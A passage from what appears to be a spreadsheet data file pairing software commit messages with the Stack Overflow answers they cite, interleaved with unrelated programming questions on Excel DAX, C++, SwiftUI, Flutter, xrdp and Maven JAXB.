&lt;p&gt;Then aggregation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;plan := 
VAR _dimension = IF(HASONEVALUE(dimensions_list[dimension]), VALUES(dimensions_list[dimension]), BLANK())
RETURN SWITCH(
  _dimension, 
  &amp;quot;sales&amp;quot;, CALCULATE([_sales], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;expense&amp;quot;, CALCULATE([_expense], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;orders&amp;quot;, CALCULATE([_orders], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;clicks&amp;quot;, CALCULATE([_clicks], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;impressions&amp;quot;, CALCULATE([_impressions], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;avg_order&amp;quot;, CALCULATE([_avg_order], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;cpc&amp;quot;, CALCULATE([_cpc], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;cpm&amp;quot;, CALCULATE([_cpm], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;cr&amp;quot;, CALCULATE([_cr], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;ctr&amp;quot;, CALCULATE([_ctr], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;roi&amp;quot;, CALCULATE([_roi], combined[pf] = &amp;quot;plan&amp;quot;),
  &amp;quot;expense_ratio&amp;quot;, CALCULATE([_expense_ratio], combined[pf] = &amp;quot;plan&amp;quot;)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;act measure: (similar to plan)
Var measure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Var:= IF(
  ISBLANK([plan]) &amp;amp;&amp;amp; ISBLANK([fact]), BLANK(),
  DIVIDE([fact], [plan]) - 1
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this case, we use the Excel's &amp;quot;Values&amp;quot; block as an additional dimension.&lt;/p&gt;
&lt;p&gt;AND NOW THE QUESTION:
In both approaches, the metrics &amp;quot;bar&amp;quot; (inserted from an aux table) does not appear in total (which is one of the goals of the entire task).
It's doesn't appear in the grand total, neither in subtotals for each individual dimensions.
Moreover, when adding multiple levels of dimensions, like platform / channel, it shows the &amp;quot;bar&amp;quot; only for lowest level, collapsing upper one leads to its disappearing.&lt;/p&gt;
&lt;p&gt;I guess it's somehow related to the switch condition and HASONEVALUE, but have no sufficient experience to solve it.
Please help.&lt;/p&gt;
&lt;p&gt;Technical Limitation:
It should be Excel. This is not so much about creating dashboards but rather providing auxiliary tools for current working tables. Trying to imply it in bare excel, including recalculating relative metrics, turns the table to something monstrous.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C778</t>
  </si>
  <si>
    <t>Remove default references to global property sheets from the VS projects
They are deprecated since Visual Studio 2019. See this:
https://learn.microsoft.com/en-us/cpp/build/create-reusable-property-configurations?view=msvc-160
https://stackoverflow.com/questions/61594646/microsoft-cpp-win32-user-props-file-missing
https://stackoverflow.com/questions/9248526/how-do-i-restore-a-property-sheet-to-its-default-value/
In the future, it might make sense to instead add custom property sheets for each configuration (or at least a group of configurations by platform), so that an outside user would not have to change the project itself if necessary, causing the version control system to mark the corresponding file as modified.
https://stackoverflow.com/questions/27562477/how-to-change-settings-for-c-project-locally
https://stackoverflow.com/questions/71930510/where-is-vs-configuration-properties-stored</t>
  </si>
  <si>
    <t>According to Microsoft, VS 2019 no longer creates the .props files by default.
From Cannot see Microsoft.Cpp.Win32.user in Property Manager:
The behavior is intended. Visual Studio 2019 will not create .user files anymore. But if .user files already exist, projects will automatically import them.</t>
  </si>
  <si>
    <t xml:space="preserve">Seems like every project I'm on uses a Model View Controller architecture, and that's how I roll my own projects. Is there an alternative? How else would one create an application that has persistent storage and a user interface?
</t>
  </si>
  <si>
    <t>C779</t>
  </si>
  <si>
    <t>Use requests session for reuse http conections (increase performance) https://stackoverflow.com/a/34491383</t>
  </si>
  <si>
    <t>The requests module is stateless and if I repeatedly call get for the same URL, wouldnt it create a new connection each time?
The
requests
module is not stateless; it just lets you ignore the state and effectively use a global singleton state if you choose to do so.*
And it (or, rather, one of the underlying libraries,
urllib3
) maintains a connection pool keyed by (hostname, port) pair, so it will usually just magically reuse a connection if it can.
As
the documentation
says:
Excellent news — thanks to urllib3, keep-alive is 100% automatic
  within a session! Any requests that you make within a session will
  automatically reuse the appropriate connection!
Note that connections are only released back to the pool for reuse
  once all body data has been read; be sure to either set
stream
to
False
or read the
content
property of the
Response
object.
So, what does "if it can" mean? As the docs above imply, if you're keeping streaming response objects alive, their connections obviously can't be reused.
Also, the connection pool is really a finite cache, not infinite, so if you spam out a ton of connections and two of them are to the same server, you won't
always
reuse the connection, just
often
. But usually, that's what you actually want.
* The particular state relevant here is the
transport adapter
. Each session gets a transport adapter. You can specify the adapter manually, or you can specify a global default, or you can just use the default global default, which basically just wraps up a
urllib3.PoolManager
for managing its HTTP connections. For more information, read the docs.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;MyClass&lt;/code&gt; is a normal class , and &lt;code&gt;MyClass&amp;lt;int&amp;gt;&lt;/code&gt; is class template.
If I want they have the same class name &lt;code&gt;MyClass&lt;/code&gt;, how to fix my codes?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
class MyClass {
public:
    void print() {
        std::cout &amp;lt;&amp;lt; &amp;quot;This is the normal class.&amp;quot; &amp;lt;&amp;lt; std::endl;
    }
};
template &amp;lt;typename T&amp;gt;
class MyClass {
public:
    void print() {
        std::cout &amp;lt;&amp;lt; &amp;quot;This is the class template.&amp;quot; &amp;lt;&amp;lt; std::endl;
    }
};
int main() {
    MyClass obj1;
    obj1.print();  // This is the normal class.
    MyClass&amp;lt;int&amp;gt; obj2;
    obj2.print();  // This is the class template.
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C78</t>
  </si>
  <si>
    <t>Start over with new implementation.
Parallelising was indicating that the code had to be more modular. For
instance, we need to be able to loop over a range. Which was leading to the
calculation of the range, and hence the use of the modulo operation.
This is when I stumble upon http://stackoverflow.com/a/23045070/421846.</t>
  </si>
  <si>
    <t>Am not sure but i think this is the answer to your question. If you want three groups than you should have 3 different loops.Its pretty simple when you see the output of this program. You just need to increment the value of what ever you want to generate there possible combination.
The below Code will generate all possible combination  of "abcd" in groups of 3, from [aaa] to [ddd].
int main()
{
   char ch1;
   char ch2;
   char ch3;
    for(ch1='a';ch1&lt;='d';ch1++)
    {
	   for(ch2='a';ch2&lt;='d';ch2++)
	   {
		    for(ch3='a';ch3&lt;='d';ch3++)
		    {
			   printf("%c %c %c\n",ch1,ch2,ch3);
		    }
            printf("\n"); //just to have clean and understandable output
	   }
       printf("\n\n\n"); //just to have clean and understandable output
    }
 return 0;
}</t>
  </si>
  <si>
    <t xml:space="preserve">When I first heard about StackOverflow, and heard that it was being built in ASP.Net MVC, I was a little confused.  I thought ASP.Net was always an example of an MVC architecture.  You have the .aspx page that provides the view, the .aspx.vb page that provides the controller, and you can create another class to be the model.  The process for using MVC in ASP.Net is described in this [external-link].
So my question is.  What Does ASP.Net MVC provide that you wouldn't be able to do with regular ASP.Net (even as far back as ASP.Net 1.1)?  It is just fancy URLs?  Is it just for bragging rights for MS to be able to compare themselves with new technologies like Ruby On Rails, and say, "We can do that too"?  Is there something more that ASP.Net MVC actually provides, rather than a couple extra templates in the File-&gt;New menu?
I'm probably sounding really skeptical and negative right now, so I'll just stop.  But I really want to know what ASP.Net MVC actually provides. Also, if anybody can tell me why it's Model-View-Controller and not in order of the layers of View-Controller-Model or Model-Control-View depending on whether you are going top to bottom, or vice versa, I'd really appreciate that too. 
EDIT
Also, it's probably worth pointing out that I've never really cared for the web forms (AKA server controls) model either.  I've only used it minimally, and never on the job.  
</t>
  </si>
  <si>
    <t>C780</t>
  </si>
  <si>
    <t>Fix unwanted load balancing between 5353 socket on linux.
http://hacked10bits.blogspot.com/2014/12/udp-binding-and-port-reuse-in-linux.html?m=1
https://stackoverflow.com/questions/14388706/how-do-so-reuseaddr-and-so-reuseport-differ</t>
  </si>
  <si>
    <t xml:space="preserve">We all agree that duplication is evil and should be avoid (Don't Repeat Yourself principle). 
To ensure that, static analysis code should be used like [external-link] (Multi Language) or [external-link] (Visual Studio add-in)
I just read [external-link] where he is saying that :
  8.5% of Kobe is copy &amp; pasted code. And that is with the sensitivity
  dialed high, if we set the threshold
  to 3, which is what I commonly do, is
  goes up to 12.5%.
I think that 3 as threshold is very low.
In my company we offer quality code analysis as a service, our default threshold for duplication is set to 20 and there is a lot of duplications. I can't imagine if we set it to 3, it would be impossible for our customer to even think about correction. 
I understand Ayende's opinion about Kobe: it's an official sample and is marketed as â€œintended to guide you with the planning, architecting, and implementing of Web 2.0 applications and services.â€ so the expectation of quality is high.
But for your project what minimum threshold do you use for duplication?
Related question : [external-link]
</t>
  </si>
  <si>
    <t>C781</t>
  </si>
  <si>
    <t>Optimized string keys for reuse
See also,
- https://stackoverflow.com/questions/11549954/complexity-of-string-gethashcode
- https://stackoverflow.com/questions/3053726/why-might-a-system-string-object-not-cache-its-hash-code</t>
  </si>
  <si>
    <t>Good question!
I asked the same thing a while back.
Basically, it's a speed/memory trade-off. The benefit of caching string hash codes is arguably outweighed by the overhead of every single string object requiring another 32 bits of memory to be allocated. This makes sense when you think about the large number of strings that may exist in a program versus the number whose hash codes you care about (presumably because you're using them as keys).
The latter number may be large in some programs, but it may also be quite small. It could even be zero in a lot of cases.
If performance were an extreme concern for you in certain scenarios, you might consider writing your own wrapper that does cache its hash code:
public class StringKey
{
    string value;
    int hashCode;
    public StringKey(string value)
    {
        this.value = value;
        this.hashCode = value.GetHashCode();
    }
    public override int GetHashCode()
    {
        return this.hashCode;
    }
    public override string ToString()
    {
        return this.value;
    }
    // Plus all the other stuff you'd want to include here,
    // e.g., Equals, CompareTo, etc.
}
To get any benefit out of this, of course, you'd still need to be very careful to reuse these StringKey objects basically throughout your program everywhere. In the vast majority of cases, this would not be worth the effort; I've included the idea only as something to consider if you happen to be an exceptional case.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Apache Camel: How to decode responseBody when receiving a 400 error?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am using Apache Camel to send HTTP requests. When the request is successful, the response body is correctly represented. However, if the server returns a 400 Bad Request, the responseBody (from HttpOperationFailedException) appears as [B@3f6751a, indicating it is a byte[].&lt;/p&gt;
&lt;p&gt;Hereâ€™s the relevant part of my Camel route:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.toD(&amp;quot;${exchangeProperty.url}?bridgeEndpoint=true&amp;amp;charset=UTF-8&amp;quot;)
.to(&amp;quot;log:DEBUG?showBody=true&amp;amp;showHeaders=true&amp;quot;)
.onException(HttpOperationFailedException.class)
    .log(&amp;quot;Exception: ${exception.responseBody}&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When there is no error, the response body is properly formatted.&lt;/p&gt;
&lt;p&gt;Logs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CamelServletContextPath=/postRestApi, Connection=keep-alive, Content-Length=43,
Content-Type=application/json; charset=utf-8, Date=Tue, 18 Feb 2025 13:55:21 GMT, 
ETag=W/&amp;quot;2b-hGShxOkieaAVDloBubJVM+h58D8&amp;quot;, Server=openresty, 
Strict-Transport-Security=max-age=63072000;includeSubDomains; preload, X-Powered-By=Express},
BodyType: byte[], Body: [B@1d6f2a32
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I properly decode responseBody when an error occurs?&lt;/p&gt;
&lt;p&gt;The issue is that when I try to decode responseBody into a string, I get a type mismatch errorString&lt;/p&gt;
&lt;p&gt;decodedResponse = new String(responseBody, StandardCharsets.UTF_8);&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; constructor java.lang.String.String(byte[],int) is not applicable (argument mismatch; java.lang.String cannot be converted to byte[])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;[B@3f6751a is a String.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C782</t>
  </si>
  <si>
    <t>Reuse the TagsConverter across multiple classes
Thanks to https://stackoverflow.com/questions/44350350/writing-reusable-jsonconverters-for-json-net</t>
  </si>
  <si>
    <t>There is an additional JsonConverter constructor overload that takes both a type and a params object[] converterParameters that is injected into the concrete instance of your converter.  You can take advantage of this overload to maximize your reusability.
public class TagsConverter : JsonConverter
{
	private readonly string _delimiter;
	public TagsConverter(string delimiter)
	{
		_delimiter = delimiter;	
	}
	public override bool CanConvert(Type objectType)
	{
		return (objectType == typeof(string));
	}
	public override object ReadJson(JsonReader reader, Type objectType, 
        object existingValue, JsonSerializer serializer)
	{
		return reader
				.Value
				.ToString()
				.Split(_delimiter.ToCharArray())
				.ToList();
	}
	public override void WriteJson(JsonWriter writer, object value, 
        JsonSerializer serializer)
	{
		var list = (List&lt;string&gt;)value;
		var delimitedList = string.Join(_delimiter, list);
		writer.WriteValue(delimitedList);
	}
}
Utilizing the overload is as easy as passing it as a second parameter:
public class Foo
{
	[JsonConverter(typeof(TagsConverter), " ")]
	public List&lt;string&gt; Tags { get; set; }
}</t>
  </si>
  <si>
    <t xml:space="preserve">I have a Question object thats the root of the Question Aggregate. THe question has associated Answer Entities in its aggregate . When a new Answer object is created, the changes will be saved to DB via repository. Can I call a repository method SaveAnswer(Question ID) or must I call a SaveQuestion(QUestionID) and have the Repository determine what changes were made? If the latter, how is this implemented? 
Conversely, If I want to load up all the Answers to a particular Question, must I call GetQuestion() and then pull the answers, or can I simply call GetAnswers(questionID).
tia
</t>
  </si>
  <si>
    <t>C783</t>
  </si>
  <si>
    <t>feat: Stop details sheet navigation changes (#220)
* feat: new sheet pops up per view. navigation todo
id trick: https://stackoverflow.com/a/77429540
* add doc
* feat: onDismiss working, nav WIP, type error somewhere
* fix: navigation + sheet fixes
* fix: repair tests relying on old nav
* refactor: reusable SheetNavigationLink view
* test: Add tests for back button functionality
* cleanup unused changes
* cleanup: close button + detents
* fix(SheetHeaderTests): Cleanup missing renaming</t>
  </si>
  <si>
    <t>I don't think you can use
sheet(item:)
if you don't want the sheet disappearing and reappearing. Even if the
presentationDetents
bug is fixed, I think the intended behaviour of
sheet(item:)
is still going to be "dismiss the sheet then present another one" when the item changes.
Use
sheet(isPresented:)
instead. Show the sheet as long as the selection is not nil.
.sheet(isPresented: isNotNil($selection)) {
    if let selection {
        Text("Item selected: \(selection)")
            .presentationDetents([.medium])
            .presentationBackgroundInteraction(.enabled(upThrough: .medium))
    }
}
func isNotNil&lt;T&gt;(_ binding: Binding&lt;T?&gt;) -&gt; Binding&lt;Bool&gt; {
    Binding {
        binding.wrappedValue != nil
    } set: { notNil in
        if !notNil {
            binding.wrappedValue = nil
        }
    }
}
If you don't mind the sheet disappearing and appearing again, you can add a separate
@State
for presenting sheet. Set that state to an intermediary
nil
value when
selection
changes.
@State var sheetItem: String?
.onChange(of: selection) { x in
    sheetItem = nil
    DispatchQueue.main.async {
        sheetItem = x
    }
}
.sheet(item: $selection) { choice in ... }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having an issue with the special keys using XRDP on an Raspberry PI.&lt;/p&gt;
&lt;p&gt;I've downloaded xrdp and configured it, then when connecting and opening a terminal, some keys are messing up everything.&lt;/p&gt;
&lt;p&gt;For exemple :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Arrow keys are writting 'A' 'B' 'C' and 'D'&lt;/li&gt;
&lt;li&gt;The capslock seems activated even tho it's not&lt;/li&gt;
&lt;li&gt;Pressing the left shift key seems to deactivate the caps lock only for number&lt;/li&gt;
&lt;li&gt;Tab key is not working at all&lt;br /&gt;
And so on ...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I saw &lt;a href="https://c-nergy.be/blog/?p=3858" rel="nofollow noreferrer"&gt;this post&lt;/a&gt; talking about a problem that looks similar, but the solution they give is not working for me.&lt;/p&gt;
&lt;p&gt;What have I done :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I've downloaded the appropriate keymap (km-0000040C.ini in my case) &lt;a href="https://github.com/neutrinolabs/xrdp/blob/master/instfiles/km-0000040c.ini" rel="nofollow noreferrer"&gt;here&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;I've put the file with the same permissions in /etc/xrdp&lt;/li&gt;
&lt;li&gt;I've restarted my service from the RPI console with &lt;code&gt;sudo service srdp restart&lt;/code&gt;(which worked as I got kicked from my session)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And when connecting again to my xrdp session I still have the issue.&lt;br /&gt;
I went to check if the file was still the one I put and yes it is.&lt;/p&gt;
&lt;p&gt;At one point it suddenly worked fine without me knowing what I did. Then I closed the terminals, disconnected from the xrdp session then reconnected and the problemes appeared again.&lt;/p&gt;
&lt;p&gt;My last clue would be that the files that are taken in account are not the one I changed in /etc/xrdb but I have no idea how to check that.&lt;/p&gt;
&lt;p&gt;My Linux version (&lt;code&gt;lsb_release -a&lt;/code&gt;) is Debian GNU/Linux 12 (bookworm)&lt;br /&gt;
My /etc/xrdp folder : &lt;a href="https://i.sstatic.net/Lmq7DQdr.png" rel="nofollow noreferrer"&gt;Picture of the /etc/xrdp folder&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Edit :&lt;/strong&gt;&lt;/em&gt; There is a warning message on /var/log/xrdp.log that says : &amp;quot;local keymap file for 0x0000040c found and doesn't match built in keymapa, using local keymap file&amp;quot;&lt;/p&gt;
&lt;p&gt;If anyone has any solution or idea I'm all hears.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C784</t>
  </si>
  <si>
    <t>IDEMPIERE-5903 support multiple webservice project (#2084)
* IDEMPIERE-5903:support multi webservice project (issue 1:There is an endpoint already running on/rest)
https://stackoverflow.com/a/49553239/4037367
* IDEMPIERE-5903:support multi webservice project (reuse resource)
* IDEMPIERE-5903:support multi webservice project (fix comment review)</t>
  </si>
  <si>
    <t>I've found the solution, there was a problem with DestionationRegistry which was created by default by CXF HTTP Transport OSGI Bundle (the one that registered default /cxf/* endpoint). I had to disable this bundle by setting
org.apache.cxf.osgi.http.transport.disable = true
in Karaf properties</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently developing a WPF client application which uses Linq-to-SQL for the typed table objects and to wrap around an abundance of CRUD stored procedures in a MS SQL database on an external server. I do not foresee manipulating data directly via the context, only the stored procedures.
My two biggest concerns are:
1) Database security
2) Flexible architecture
As far as I can tell, since the application will be readily available for download via the internet, storing database connection information in the application itself is not an option (for security reasons). I feel my only option is putting my DAL in a web service.
User credentials can be passed along on a per-operation basis and database connection information will be stored safely on a secure web server.
I am curious as to whether this is method is valid, and if so is it optimal? Can I easily serialize Linq-to-SQL objects (table and stored procedure results) to send back and forth between the client and the web service?
Thank you in advance.
</t>
  </si>
  <si>
    <t>C785</t>
  </si>
  <si>
    <t>Add reusable text component
- Use [Text widget](https://api.flutter.dev/flutter/widgets/Text-class.html)
- Use [custom color](https://stackoverflow.com/a/53875762)</t>
  </si>
  <si>
    <t>It's a MaterialColor object (not Color) you should assign for a swatch property, providing color values for the ten different luminances.
Many people suggested adjusting the alpha/opacity value of the colors used in the MaterialColor. It's actually a big mistake because it will result in making your element translucent without providing color variety of different shades.
Please consider using this solution for a better approach.
Flutter: Creating a custom color swatch for MaterialColor
MaterialColor createMaterialColor(Color color) {
  List strengths = &lt;double&gt;[.05];
  final swatch = &lt;int, Color&gt;{};
  final int r = color.red, g = color.green, b = color.blue;
  for (int i = 1; i &lt; 10; i++) {
    strengths.add(0.1 * i);
  }
  strengths.forEach((strength) {
    final double ds = 0.5 - strength;
    swatch[(strength * 1000).round()] = Color.fromRGBO(
      r + ((ds &lt; 0 ? r : (255 - r)) * ds).round(),
      g + ((ds &lt; 0 ? g : (255 - g)) * ds).round(),
      b + ((ds &lt; 0 ? b : (255 - b)) * ds).round(),
      1,
    );
  });
  return MaterialColor(color.value, swatch);
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to train a classifier model. I am following instructions which outline to use the format bellow. whenever I go to then train my model, docker returns this error. I am unsure what I need to do to fix this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CLASS_SAMPLES_SPECIFIC='[ \ 
    {&amp;quot;SAMPLES&amp;quot;: 6473, &amp;quot;CLASS&amp;quot;: &amp;quot;BB&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5262, &amp;quot;CLASS&amp;quot;: &amp;quot;BC&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 4624, &amp;quot;CLASS&amp;quot;: &amp;quot;BI&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 1287, &amp;quot;CLASS&amp;quot;: &amp;quot;CH&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 7143, &amp;quot;CLASS&amp;quot;: &amp;quot;CY&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 11516, &amp;quot;CLASS&amp;quot;: &amp;quot;DR&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 12, &amp;quot;CLASS&amp;quot;: &amp;quot;FS&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 4975, &amp;quot;CLASS&amp;quot;: &amp;quot;GF&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5915, &amp;quot;CLASS&amp;quot;: &amp;quot;GS&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5315, &amp;quot;CLASS&amp;quot;: &amp;quot;HC&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5121, &amp;quot;CLASS&amp;quot;: &amp;quot;MO&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 1731, &amp;quot;CLASS&amp;quot;: &amp;quot;MUD&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5232, &amp;quot;CLASS&amp;quot;: &amp;quot;OP&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 435, &amp;quot;CLASS&amp;quot;: &amp;quot;PO&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5921, &amp;quot;CLASS&amp;quot;: &amp;quot;RB&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 6832, &amp;quot;CLASS&amp;quot;: &amp;quot;RC&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 3028, &amp;quot;CLASS&amp;quot;: &amp;quot;RF&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 3172, &amp;quot;CLASS&amp;quot;: &amp;quot;RS&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5200, &amp;quot;CLASS&amp;quot;: &amp;quot;SK&amp;quot;}, \ 
    {&amp;quot;SAMPLES&amp;quot;: 5501, &amp;quot;CLASS&amp;quot;: &amp;quot;TU&amp;quot;} \ 
]' 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the error returned is :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;docker: invalid env file (C:\Users\radia\OneDrive\Desktop\volume\env\training_env.env): variable '{&amp;quot;SAMPLES&amp;quot;: 6473, &amp;quot;CLASS&amp;quot;: &amp;quot;BB&amp;quot;},\ ' contains whitespaces.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried to remove all white spaces but continued to get the error. I believe it is a formatting issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C786</t>
  </si>
  <si>
    <t xml:space="preserve">We are developing a GIS based application which simulates the real word objects (i.e. Pipes, Roads, etc) in a virtual reality environment. Currently we use [external-link] from [external-link] package for 3D rendering, and in future we intend to replace it with our own 3D environment. 
Question:
What is the best way to have realtime 3D rendering in above mentioned application?
I do not have any experience in this field and i'm really confused. Should I use one of the available 3D rendering engine (some listed below)? if the answer is yes, then which parameters should be considered (regardless of its cost)?
Does any one have any experience or suggestion in this field?
circumstance and necessities:
We use C# .NET environment for developing the application
There are huge amount of 3D objects to show 
3D objects are grouped in different CAD files
Interaction with final 3D scene is essential (e.g. Select one 3D object)
Load, unload, on, off and set transparency of one layer and/or object(s) are required.
High performance in realtime rendering of widespread models (More than 800 hectare area) with high details (from Roads to very fine objects like one screw)
There is no need to advance shading issues (at this time)
Texture must be applicable
Rendring Engines:
After some search I found the following 3D rendering solutions: 
[external-link]: "The CadFaster|Engine is a unique and the most scalable 3D rendering solution for technical applications. It is over ten times faster than usual CAD applications. The engine includes patented real-time synchronization mechanisms for 3D data sets and geometry which allows automatic integration to the master application. CadFaster|Engine also contains patented real-time polygon reduction which improves the 3D performance." cited from DevMaster
[external-link]: "Use Quest3D to create software, web and simulators. Quest3D is the perfect solution for architecture visualization, product visualization, digital entertainment,
computer aided training and high-end VR applications." cited from Quest3D introduction
[external-link]: "The OpenSceneGraph is an open source high performance 3D graphics toolkit, used by application developers in fields such as visual simulation, games, virtual reality, scientific visualization and modelling. Written entirely in Standard C++ and OpenGL ... . The OpenSceneGraph is now well established as the world leading scene graph technology, used widely in the vis-sim, space, scientific, oil-gas, games and virtual reality industries. The main language: C/C++ Language wrappers: C#, ... ." cited from OSG home page.
Also there is a list of nearly complete available engines at [external-link] and [external-link]
</t>
  </si>
  <si>
    <t>C787</t>
  </si>
  <si>
    <t>Added a demo project for https://stackoverflow.com/questions/50176111/maven-jaxb2-plugin-reusing-commons-xsd-within-same-project.</t>
  </si>
  <si>
    <t>Disclaimer: I am the author of maven-jaxb2-plugin.
TL;DR here's a test project which demonstrates how to do this.
This is possible, but is a bit hairy, so please bear with me.
If a.xsd, b.xsd and c.xsd are in the same namespace, a.xsd and b.xsd cannot import c.xsd, they can only include it. We want to generate each of the XSDs into its own package, say test.a, test.b and test.c and do it within the same single Maven project.
To do this we will need three separate executions of the maven-jaxb2-plugin, each configured with its own schema and target package. For example:
		&lt;plugin&gt;
			&lt;groupId&gt;org.jvnet.jaxb2.maven2&lt;/groupId&gt;
			&lt;artifactId&gt;maven-jaxb2-plugin&lt;/artifactId&gt;
			&lt;executions&gt;
				&lt;execution&gt;
					&lt;id&gt;xjc-a&lt;/id&gt;
					&lt;goals&gt;
						&lt;goal&gt;generate&lt;/goal&gt;
					&lt;/goals&gt;
					&lt;configuration&gt;
						&lt;generatePackage&gt;test.a&lt;/generatePackage&gt;
						&lt;generateDirectory&gt;${project.build.directory}/xjc-a&lt;/generateDirectory&gt;
						&lt;schemaIncludes&gt;
							&lt;includes&gt;a.xsd&lt;/includes&gt;
						&lt;/schemaIncludes&gt;
					&lt;/configuration&gt;
				&lt;/execution&gt;
                &lt;!-- xjc-b and xjc-c follow --&gt;
			&lt;/executions&gt;
		&lt;/plugin&gt;
It is is important to use different target directories for separate executions.
OK, this would create three target directories with three target packages. Next problem is that classes from c.xsd will generated in test.a and test.b which we want to avoid.
To achieve this, we have to tell XJC to use classes from test.c for types from c.xsd. This is actually what episode file is for. This file is normally generated under META-INF\sun-jaxb.episode and it contains bindings for all types in the processed schema. Here's an example generated for c.xsd:
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;bindings xmlns="http://java.sun.com/xml/ns/jaxb" if-exists="true" version="2.1"&gt;
  &lt;bindings xmlns:tns="urn:test" if-exists="true" scd="x-schema::tns"&gt;
    &lt;schemaBindings map="false"&gt;
      &lt;package name="test.c"/&gt;
    &lt;/schemaBindings&gt;
    &lt;bindings if-exists="true" scd="~tns:CType"&gt;
      &lt;class ref="test.c.CType"/&gt;
    &lt;/bindings&gt;
  &lt;/bindings&gt;
&lt;/bindings&gt;
Episode file is actually a normal bindings file. So you can directly use it in compilation:
				&lt;execution&gt;
					&lt;id&gt;xjc-a&lt;/id&gt;
					&lt;goals&gt;
						&lt;goal&gt;generate&lt;/goal&gt;
					&lt;/goals&gt;
					&lt;configuration&gt;
						&lt;generatePackage&gt;test.a&lt;/generatePackage&gt;
						&lt;generateDirectory&gt;${project.build.directory}/xjc-a&lt;/generateDirectory&gt;
						&lt;schemaIncludes&gt;
							&lt;includes&gt;a.xsd&lt;/includes&gt;
						&lt;/schemaIncludes&gt;
						&lt;bindings&gt;
							&lt;binding&gt;
								&lt;fileset&gt;
									&lt;directory&gt;${project.build.directory}/xjc-c/META-INF&lt;/directory&gt;
									&lt;includes&gt;
										&lt;include&gt;sun-jaxb.episode&lt;/include&gt;
									&lt;/includes&gt;
								&lt;/fileset&gt;
							&lt;/binding&gt;
						&lt;/bindings&gt;
					&lt;/configuration&gt;
				&lt;/execution&gt;
There is just one tiny problem left. Episode files generated by XJC also contain this fragment:
    &lt;schemaBindings map="false"&gt;
      &lt;!-- ... --&gt;
    &lt;/schemaBindings&gt;
It effectively says "do not generate code for schema in the given namespace". This would not be a problem if a.xsd or b.xsd would be in a different namespace. But since they are in the same namespace, this fragment will effectively turn off all code generation for a.xsd or b.xsd.
To work around this we can post-process the sun-jaxb.episode which was generated for c.xsd. This can be done with a simple XSLT:
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:jaxb="http://java.sun.com/xml/ns/jaxb" version="1.0"&gt;
	&lt;xsl:template match="@*|node()"&gt;
		&lt;xsl:copy&gt;
			&lt;xsl:apply-templates select="@*|node()" /&gt;
		&lt;/xsl:copy&gt;
	&lt;/xsl:template&gt;
	&lt;xsl:template match="jaxb:schemaBindings"/&gt;
&lt;/xsl:stylesheet&gt;
